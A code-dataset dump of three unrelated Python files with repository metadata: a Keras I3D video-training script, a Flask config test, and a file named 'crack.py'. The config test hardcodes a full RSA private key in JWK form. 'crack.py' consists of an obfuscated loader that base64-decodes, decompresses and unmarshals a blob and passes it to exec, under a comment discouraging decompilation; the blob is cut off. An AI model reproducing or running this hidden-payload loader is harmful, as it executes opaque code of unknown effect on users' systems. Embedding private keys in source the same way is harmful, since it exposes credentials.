        verbose = 1, save_best_only = True)
    cpAllLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-last.h5", verbose = 0)
    cpAllBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-best.h5",
        verbose = 1, save_best_only = True)

    # Fit top layers
    print("Fit I3D top layers with generator: %s" % (diTrainTop))
    optimizer = keras.optimizers.Adam(lr = diTrainTop["fLearn"])
    keI3DOflow.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
    count_params(keI3DOflow)

    keI3DOflow.fit_generator(
        generator = genFramesTrain,
        validation_data = genFramesVal,
        epochs = diTrainTop["nEpochs"],
        workers = 4,
        use_multiprocessing = True,
        max_queue_size = 8,
        verbose = 1,
        callbacks=[csv_logger, cpTopLast, cpTopBest])

    # Fit entire I3D model
    print("Finetune all I3D layers with generator: %s" % (diTrainAll))
    csv_logger = tf.keras.callbacks.CSVLogger("log_flow_mirror/" + sLog + "-acc_entire.csv", append = True)
    keI3DOflow = layers_unfreeze(keI3DOflow)
    optimizer = keras.optimizers.Adam(lr = diTrainAll["fLearn"])
    keI3DOflow.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
    count_params(keI3DOflow)

    keI3DOflow.fit_generator(
        generator = genFramesTrain,
        validation_data = genFramesVal,
        epochs = diTrainAll["nEpochs"],
        workers = 4,
        use_multiprocessing = True,
        max_queue_size = 8,
        verbose = 1,
        callbacks=[csv_logger, cpAllLast, cpAllBest])

    return


def train_I3D_rgb_end2end(diVideoSet, method='rgb'):
    """
    * Loads pretrained I3D model,
    * reads optical flow data generated from training videos,
    * adjusts top-layers adequately for video data,
    * trains only news top-layers,
    * then fine-tunes entire neural network,
    * saves logs and models to disc.
    """

    # directories
    sFolder = "%03d-%d"%(diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
    sClassFile = "data-set/%s/%03d/class.csv"%(diVideoSet["sName"], diVideoSet["nClasses"])
    #sVideoDir = "data-set/%s/%03d"%(diVideoSet["sName"], diVideoSet["nClasses"])
    if method == 'rgb':
        sImageDir = "data-temp/%s/%s/image"%(diVideoSet["sName"], sFolder)
    else:
        sImageDir = f"data-temp/%s/%s/image_{method}"%(diVideoSet["sName"], sFolder)
    #sImageFeatureDir = "data-temp/%s/%s/image-i3d"%(diVideoSet["sName"], sFolder)
    #sOflowDir = "data-temp/%s/%s/oflow"%(diVideoSet["sName"], sFolder)
    #sOflowFeatureDir = "data-temp/%s/%s/oflow-i3d"%(diVideoSet["sName"], sFolder)
    sModelDir = "model_rgb_mirror"

    diTrainTop = {
        "fLearn" : 1e-3,
        "nEpochs" : 3}

    diTrainAll = {
        "fLearn" : 1e-4,
        "nEpochs" : 17}

    nBatchSize = 1

    print("\nStarting I3D end2end training ...")
    print(os.getcwd())

    # read the ChaLearn classes
    #oClasses = VideoClasses(sClassFile)

    # Load training data
    genFramesTrain = FramesGenerator(sImageDir + "/train_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 3)
    genFramesVal = FramesGenerator(sImageDir + "/val_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 3)

    # Load pretrained i3d model and adjust top layer
    print("Load pretrained I3D flow model ...")
    keI3DOflow = Inception_Inflated3d(
        include_top=False,
        weights='rgb_imagenet_and_kinetics',
        input_shape=(diVideoSet["nFramesNorm"], 224, 224, 3))
    print("Add top layers with %d output classes ..." % 63)
    keI3DOflow = layers_freeze(keI3DOflow)
    keI3DOflow = add_i3d_top(keI3DOflow, 63, dropout_prob=0.5)

    # Prep logging
    sLog = time.strftime("%Y%m%d-%H%M", time.gmtime()) + \
        "-%s%03d-%03d-rgb-i3d"%(diVideoSet["sName"], diVideoSet["nClasses"], diVideoSet["nFramesNorm"])

    # Helper: Save results
    csv_logger = tf.keras.callbacks.CSVLogger("log_rgb_mirror/" + sLog + "-acc_above.csv", append = True)

    # Helper: Save the model
    os.makedirs(sModelDir, exist_ok=True)
    cpTopLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-last.h5", verbose = 0)
    cpTopBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-best.h5",
        verbose = 1, save_best_only = True)
    cpAllLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-last.h5", verbose = 0)
    cpAllBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-best.h5",
        verbose = 1, save_best_only = True)

    # Fit top layers
    print("Fit I3D top layers with generator: %s" % (diTrainTop))
    optimizer = keras.optimizers.Adam(lr = diTrainTop["fLearn"])
    keI3DOflow.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
    count_params(keI3DOflow)

    keI3DOflow.fit_generator(
        generator = genFramesTrain,
        validation_data = genFramesVal,
        epochs = diTrainTop["nEpochs"],
        workers = 4,
        use_multiprocessing = True,
        max_queue_size = 8,
        verbose = 1,
        callbacks=[csv_logger, cpTopLast, cpTopBest])

    # Fit entire I3D model
    print("Finetune all I3D layers with generator: %s" % (diTrainAll))
    csv_logger = tf.keras.callbacks.CSVLogger("log_rgb_mirror/" + sLog + "-acc_entire.csv", append = True)
    keI3DOflow = layers_unfreeze(keI3DOflow)
    optimizer = keras.optimizers.Adam(lr = diTrainAll["fLearn"])
    keI3DOflow.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
    count_params(keI3DOflow)

    keI3DOflow.fit_generator(
        generator = genFramesTrain,
        validation_data = genFramesVal,
        epochs = diTrainAll["nEpochs"],
        workers = 4,
        use_multiprocessing = True,
        max_queue_size = 8,
        verbose = 1,
        callbacks=[csv_logger, cpAllLast, cpAllBest])

    return


def train_I3D_combined_end2end(diVideoSet, method='rgb'):
    """
    * Loads pretrained I3D model,
    * reads optical flow data generated from training videos,
    * adjusts top-layers adequately for video data,
    * trains only news top-layers,
    * then fine-tunes entire neural network,
    * saves logs and models to disc.
    """

    # directories
    sFolder = "%03d-%d"%(diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
    sClassFile = "data-set/%s/%03d/class.csv"%(diVideoSet["sName"], diVideoSet["nClasses"])
    #sVideoDir = "data-set/%s/%03d"%(diVideoSet["sName"], diVideoSet["nClasses"])
    if method == 'rgb':
        sImageDir = "data-temp/%s/%s/image"%(diVideoSet["sName"], sFolder)
    else:
        sImageDir = f"data-temp/%s/%s/image_{method}"%(diVideoSet["sName"], sFolder)
    #sImageFeatureDir = "data-temp/%s/%s/image-i3d"%(diVideoSet["sName"], sFolder)
    sOflowDir = "data-temp/%s/%s/oflow"%(diVideoSet["sName"], sFolder)
    #sOflowFeatureDir = "data-temp/%s/%s/oflow-i3d"%(diVideoSet["sName"], sFolder)
    sModelDir = "model_combined_mirror"

    diTrainTop = {
        "fLearn" : 1e-3,
        "nEpochs" : 3}

    diTrainAll = {
        "fLearn" : 1e-4,
        "nEpochs" : 17}

    nBatchSize = 1

    print("\nStarting I3D end2end training ...")
    print(os.getcwd())

    # read the ChaLearn classes
    #oClasses = VideoClasses(sClassFile)

    # Load training data
    genFramesTrain_flow = FramesGenerator(sOflowDir + "/train_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 2, bShuffle=False)
    genFramesVal_flow = FramesGenerator(sOflowDir + "/val_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 2, bShuffle=False)
    genFramesTrain_rgb = FramesGenerator(sImageDir + "/train_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 3, bShuffle=False)
    genFramesVal_rgb = FramesGenerator(sImageDir + "/val_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 3, bShuffle=False)

    # Load pretrained i3d model and adjust top layer
    print("Load pretrained I3D flow model ...")
    keI3DOflow = Inception_Inflated3d(
        include_top=False,
        weights='flow_imagenet_and_kinetics',
        #weights='model/20200704-1221-tsl100-oflow-i3d-entire-best.h5',
        input_shape=(diVideoSet["nFramesNorm"], 224, 224, 2))
    print("Add top layers with %d output classes ..." % 63)
    keI3DOflow = layers_freeze(keI3DOflow)
    keI3DOflow = add_i3d_top(keI3DOflow, 63, dropout_prob=0.5, late_fusion=True)

    print("Load pretrained I3D rgb model ...")
    keI3Drgb = Inception_Inflated3d(
        include_top=False,
        weights='rgb_imagenet_and_kinetics',
        #weights='model/20200704-1221-tsl100-oflow-i3d-entire-best.h5',
        input_shape=(diVideoSet["nFramesNorm"], 224, 224, 3),
        layer_name='RGB')
    print("Add top layers with %d output classes ..." % 63)
    keI3Drgb = layers_freeze(keI3Drgb)
    keI3Drgb = add_i3d_top(keI3Drgb, 63, dropout_prob=0.5, late_fusion=True, layer_name='RGB')

    keI3Dfusion = model_fusion(keI3Drgb, keI3DOflow)

    # Prep logging
    sLog = time.strftime("%Y%m%d-%H%M", time.gmtime()) + \
        "-%s%03dclass-%03dframe-combined-%s-i3d"%(diVideoSet["sName"], diVideoSet["nClasses"], diVideoSet["nFramesNorm"], method)

    # Helper: Save results
    csv_logger = tf.keras.callbacks.CSVLogger("log_combined_mirror/" + sLog + "-acc_above.csv", append = True)

    # Helper: Save the model
    os.makedirs(sModelDir, exist_ok=True)
    cpTopLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-last.h5", verbose = 0)
    cpTopBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-best.h5",
        verbose = 1, save_best_only = True)
    cpAllLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-last.h5", verbose = 0)
    cpAllBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-best.h5",
        verbose = 1, save_best_only = True)

    # Fit top layers
    print("Fit I3D top layers with generator: %s" % (diTrainTop))
    optimizer = keras.optimizers.Adam(lr = diTrainTop["fLearn"])
    keI3Dfusion.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
    count_params(keI3Dfusion)

    train_gen = generate_generator_multiple(genFramesTrain_rgb, genFramesTrain_flow)
    val_gen = generate_generator_multiple(genFramesVal_rgb, genFramesVal_flow)

    keI3Dfusion.fit_generator(
        generator = train_gen,
        validation_data = val_gen,
        epochs = diTrainTop["nEpochs"],
        workers = 4,
        use_multiprocessing = False,
        max_queue_size = 8,
        verbose = 1,
        callbacks=[csv_logger, cpTopLast, cpTopBest])

    # Fit entire I3D model
    print("Finetune all I3D layers with generator: %s" % (diTrainAll))
    csv_logger = tf.keras.callbacks.CSVLogger("log_combined_mirror/" + sLog + "-acc_entire.csv", append = True)
    keI3Dfusion = layers_unfreeze(keI3Dfusion)
    optimizer = keras.optimizers.Adam(lr = diTrainAll["fLearn"])
    keI3Dfusion.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
    count_params(keI3Dfusion)

    keI3Dfusion.fit_generator(
        generator = train_gen,
        validation_data = val_gen,
        epochs = diTrainAll["nEpochs"],
        workers = 4,
        use_multiprocessing = False,
        max_queue_size = 8,
        verbose = 1,
        callbacks=[csv_logger, cpAllLast, cpAllBest])

    return


def mnodel_fine_tune(diVideoSet, method='rgb'):
    # directories
    sFolder = "%03d-%d"%(diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
    sClassFile = "data-set/%s/%03d/class.csv"%(diVideoSet["sName"], diVideoSet["nClasses"])
    #sVideoDir = "data-set/%s/%03d"%(diVideoSet["sName"], diVideoSet["nClasses"])
    if method == 'rgb':
        sImageDir = "data-temp/%s/%s/image"%(diVideoSet["sName"], sFolder)
    else:
        sImageDir = f"data-temp/%s/%s/image_{method}"%(diVideoSet["sName"], sFolder)
    #sImageFeatureDir = "data-temp/%s/%s/image-i3d"%(diVideoSet["sName"], sFolder)
    sOflowDir = "data-temp/%s/%s/oflow"%(diVideoSet["sName"], sFolder)
    #sOflowFeatureDir = "data-temp/%s/%s/oflow-i3d"%(diVideoSet["sName"], sFolder)
    sModelDir = "model_combined_mirror"

    diTrainTop = {
        "fLearn" : 1e-3,
        "nEpochs" : 3}

    diTrainAll = {
        "fLearn" : 1e-4,
        "nEpochs" : 5}

    nBatchSize = 1

    print("\nStarting I3D end2end training ...")
    print(os.getcwd())

    # read the ChaLearn classes
    #oClasses = VideoClasses(sClassFile)

    # Load training data
    genFramesTrain_flow = FramesGenerator(sOflowDir + "/train_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 2, bShuffle=False)
    genFramesVal_flow = FramesGenerator(sOflowDir + "/val_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 2, bShuffle=False)
    genFramesTrain_rgb = FramesGenerator(sImageDir + "/train_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 3, bShuffle=False)
    genFramesVal_rgb = FramesGenerator(sImageDir + "/val_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 3, bShuffle=False)

    # Prep logging
    sLog = time.strftime("%Y%m%d-%H%M", time.gmtime()) + \
        "-%s%03d-%03d-combined-i3d"%(diVideoSet["sName"], diVideoSet["nClasses"], diVideoSet["nFramesNorm"])

    cpAllLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-last.h5", verbose = 0)
    cpAllBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-best.h5",
        verbose = 1, save_best_only = True)

    keI3Dfusion = load_model('model_combined_mirror/20200723-1559-tsl100-115-combined-i3d-entire-best.h5')

    train_gen = generate_generator_multiple(genFramesTrain_rgb, genFramesTrain_flow)
    val_gen = generate_generator_multiple(genFramesVal_rgb, genFramesVal_flow)

    print("Finetune all I3D layers with generator: %s" % (diTrainAll))
    csv_logger = tf.keras.callbacks.CSVLogger("log_combined_mirror/" + sLog + "-acc_entire.csv", append = True)
    optimizer = keras.optimizers.Adam(lr = diTrainAll["fLearn"])
    keI3Dfusion.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
    count_params(keI3Dfusion)

    keI3Dfusion.fit_generator(
        generator = train_gen,
        validation_data = val_gen,
        epochs = diTrainAll["nEpochs"],
        workers = 4,
        use_multiprocessing = False,
        max_queue_size = 8,
        verbose = 1,
        callbacks=[csv_logger, cpAllLast, cpAllBest])

    return


if __name__ == '__main__':

    """diVideoSet = {"sName" : "ledasila",
        "nClasses" : 21,        # number of classes
        "nFramesNorm" : 40,     # number of frames per video
        "nMinDim" : 240,        # smaller dimension of saved video-frames
        "tuShape" : (288, 352), # height, width
        "nFpsAvg" : 25,
        "nFramesAvg" : 75,
        "fDurationAvg" : 3.0}   # seconds
    """

    diVideoSet = {"sName" : "tsl",
        "nClasses" : 100,       # number of classes
        "nFramesNorm" : 115,    # number of frames per video
        "nMinDim" : 240,        # smaller dimension of saved video-frames
        "tuShape" : (600, 480), # height, width
        "nFpsAvg" : 10,
        "nFramesAvg" : 50,
        "fDurationAvg" : 5.0}   # seconds

    #dtype='float16'
    #K.set_floatx(dtype)
    #K.set_epsilon(1e-4)

    #import os
    #os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"  # see issue #152
    #os.environ["CUDA_VISIBLE_DEVICES"] = ""

    #train_I3D_rgb_end2end(diVideoSet)
    #train_I3D_oflow_end2end(diVideoSet)
    #train_I3D_combined_end2end(diVideoSet)
    mnodel_fine_tune(diVideoSet, method='bgSub')
```

avg_line_length: 39.918129 | max_line_length: 129 | alphanum_fraction: 0.654703
qsc quality signals and flags (schema order): 2,277 | 20,478 | 5.764163 | 0.120773 | 0.037714 | 0.0256 | 0.014476 | 0.892495 | 0.877867 | 0.870095 | 0.857676 | 0.8544 | 0.841829 | 0 | 0.030292 | 0.211691 | 20,478 | 512 | 130 | 39.996094 | 0.782754 | 0.170476 | 0 | 0.787582 | 0 | 0 | 0.191922 | 0.048117 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022876 | false | 0 | 0.039216 | 0 | 0.084967 | 0.091503 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 7
---

hexsha: f8ab9a81b9b1b292ce0fa77debb4789ea11238f6 | size: 2,829 | ext: py | lang: Python

- repo: yuwern/simple_restapi @ 26dd0503f7dc269f88ae55559dab40688c38ee75, path: tests/unit/test_config.py, licenses: ["MIT"] (identical across the max_stars, max_issues, and max_forks views)
- max_stars_count: null | max_issues_count: null | max_forks_count: 1 (events 2020-06-24T08:27:44.000Z to 2020-06-24T08:27:44.000Z)

content:

```python
def test_default_config():
def test_default_config():
    from app.config import Default
    assert Default.DEBUG == False
    assert Default.TESTING == False
    assert Default.JWT_BLACKLIST_ENABLED == True
    assert Default.JWT_BLACKLIST_TOKEN_CHECKS == ['access', 'refresh']
    assert Default.SQLALCHEMY_TRACK_MODIFICATIONS == False
    assert Default.MY_PUBLIC_KEY == '{"e":"AQAB","kty":"RSA","n":"v3qQPkwnUqp5Agz4LEk7FfJoqxETO50tTZ5_GgWGx9o4o_jJmR_ND9dpktasbPLRBGcWT_-IhQxsC0LhSJfnKIvbxtzjABZtkbffDqbDHMiWLv5s5hwYYpj7N4nXD6ezEZ_74LN8M3qpl6tN-OBC0zGlmBV6g6Zg8AtHlwyImcsxgepoUwjeF5F8nZn84QZuVgmpfvOLU7k4bhwJKr0CzQL0Q5xDkxDNVuOZRPPe2ELD9NC-YJUZh-JDwfngGapA08H4rzl5eo2yXMv0LbzX_TpTUpW-5ftZgMR3QGWGV9arV3lOvvhIsMa8DZQ_Ng2QP4g5L6nyiL4Y-Lb6Hy5Zrw"}'
    assert Default.MY_PRIVATE_KEY == '{"d":"Fcl7WitOGiDdjfct0dQvTer8L-LMfm7-9aMAMVTJpjnVUgr_3VV5_sBy-ctFaUwjrk2Qg1-_B-yG6q0cdycZnUp0omcFyT_EDd2PGtqsvrywIf6_I1u1BpsDkqkzeEuLm4jJnyKtEip125UZVSUnVWKDxg9DlnE6_HU8GxrI_D6o3RqJ2_BVe82Bw7ljl9hxvz-JdDT6pkpqnCQuWAvYCmrXQsyL8dAaxjsK89ATMoWZvvHovtpYzuGcisohsgIruIbyngvTcWypHfnbiuKwEwmzgqFcpe2umGbVuA_61cXm2trSporXE9u-LsszA2V_7dMN3_wPFdvZB6M5gv0DSQ","dp":"39vUXLcW5BHFHmFeB7Z0XsPHt9MGMm4_tkmaW9ullnOZkLXKJcbiWZts-jBz_0Ut8U2pt_WyMFNSxdDub9n6lUMKNuvTazVrX2Ys9H0y23vRvnBAw1ypqQ_3QcnSd6szgdHgGxUSHx4qiIU_Wq0eFBu6MK1qvPV9ucE-nKUMs_0","dq":"IXtJ6DDV85H1FThXfo1odQEzbN34v0LiqoG7G0e-4TEGC9Zkj1vQGz8LN2mWTGV6AixlThXgkg3RIoxHzDo3LULbXtMJkwK0HQ1deR6JlJQM2gKpAtQTb05vI6Jj3y9MhtdrsdGmfburdt5kMT_olH7yxwxyfq4KslQ6mg25Ebk","e":"AQAB","kty":"RSA","n":"v3qQPkwnUqp5Agz4LEk7FfJoqxETO50tTZ5_GgWGx9o4o_jJmR_ND9dpktasbPLRBGcWT_-IhQxsC0LhSJfnKIvbxtzjABZtkbffDqbDHMiWLv5s5hwYYpj7N4nXD6ezEZ_74LN8M3qpl6tN-OBC0zGlmBV6g6Zg8AtHlwyImcsxgepoUwjeF5F8nZn84QZuVgmpfvOLU7k4bhwJKr0CzQL0Q5xDkxDNVuOZRPPe2ELD9NC-YJUZh-JDwfngGapA08H4rzl5eo2yXMv0LbzX_TpTUpW-5ftZgMR3QGWGV9arV3lOvvhIsMa8DZQ_Ng2QP4g5L6nyiL4Y-Lb6Hy5Zrw","p":"90uKsxfcbB99BwteK23-R3oEWROJ_u6IbgZEtA22DCx_b6FAeZZ8mymv0HzjvBFIdkAZ-_D1Q5caiwPpHaoASkd5RcRxo61IAYaOZNQGoYkvAGoLocffgXyzRpd60u5mOLCMoDwfrId3zvqj2qrdlEAHgpVETTmIS3VvDdDMVcM","q":"xjgKz4vGMgqnIe9dubgaU5Fgku0HMotCrhkyqxpGOxtRGR_gT-46KYOMhX_U2OmfsnI6bSI9sonPQn7f9a-xuyICWffGydiqkYpNkwhXZOlS4igfk-PW0nxhLNpLPaIyL4uBfE7RsDh0PdWcvJ1L0KDAixsABqwttGabRYXgcaU","qi":"JP1dpiSKoHRIDlxOKOk6lz8YwtMgUpUFr6OOMgiVoXfDHlBPFBMycEU6ivdlrw2sjHPnjlyPOrcQQU-2-9eXMPFTJJ2akbApkGSKMeJ98e5Ld5rlzQ0j5aQN2oqqupah3MJzP25ohQNKAbaJyUoSqVZ6DDAR4aQjvIdtTCrGDrI"}'


def test_production_config():
    from app.config import Production
    assert Production.SECRET_KEY
    assert Production.JWT_SECRET_KEY
    assert hasattr(Production, 'SQLALCHEMY_DATABASE_URI')


def test_Development_config():
    from app.config import Development
    assert Development.DEBUG
    assert Development.SECRET_KEY == 'dev'
    assert Development.JWT_SECRET_KEY == 'dev'
    assert hasattr(Development, 'SQLALCHEMY_DATABASE_URI')
```

avg_line_length: 101.035714 | max_line_length: 1,654 | alphanum_fraction: 0.889714
qsc quality signals and flags (schema order): 186 | 2,829 | 13.188172 | 0.543011 | 0.037097 | 0.015899 | 0.023237 | 0.308602 | 0.278027 | 0.278027 | 0.278027 | 0.278027 | 0.278027 | 0 | 0.102717 | 0.050194 | 2,829 | 27 | 1,655 | 104.777778 | 0.810197 | 0 | 0 | 0 | 0 | 0.1 | 0.725698 | 0.718982 | 0 | 0 | 0 | 0 | 0.7 | 1 | 0.15 | true | 0 | 0.15 | 0 | 0.3 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 7
---

hexsha: 3e285df1991bd478271c39753d8bdacc1c124d1c | size: 8,806 | ext: py | lang: Python

- repo: Tumiiso/crack @ caf100e240285e765603773d0232878f4c52ad57, path: crack.py, licenses: ["Apache-2.0"] (identical across the max_stars, max_issues, and max_forks views)
- max_stars_count: 1 (events 2021-09-02T22:49:18.000Z to 2021-09-02T22:49:18.000Z) | max_issues_count: null | max_forks_count: null

content:

```python
#Decompiled By D.B.Undergroud
#Dont try decompile bra
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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
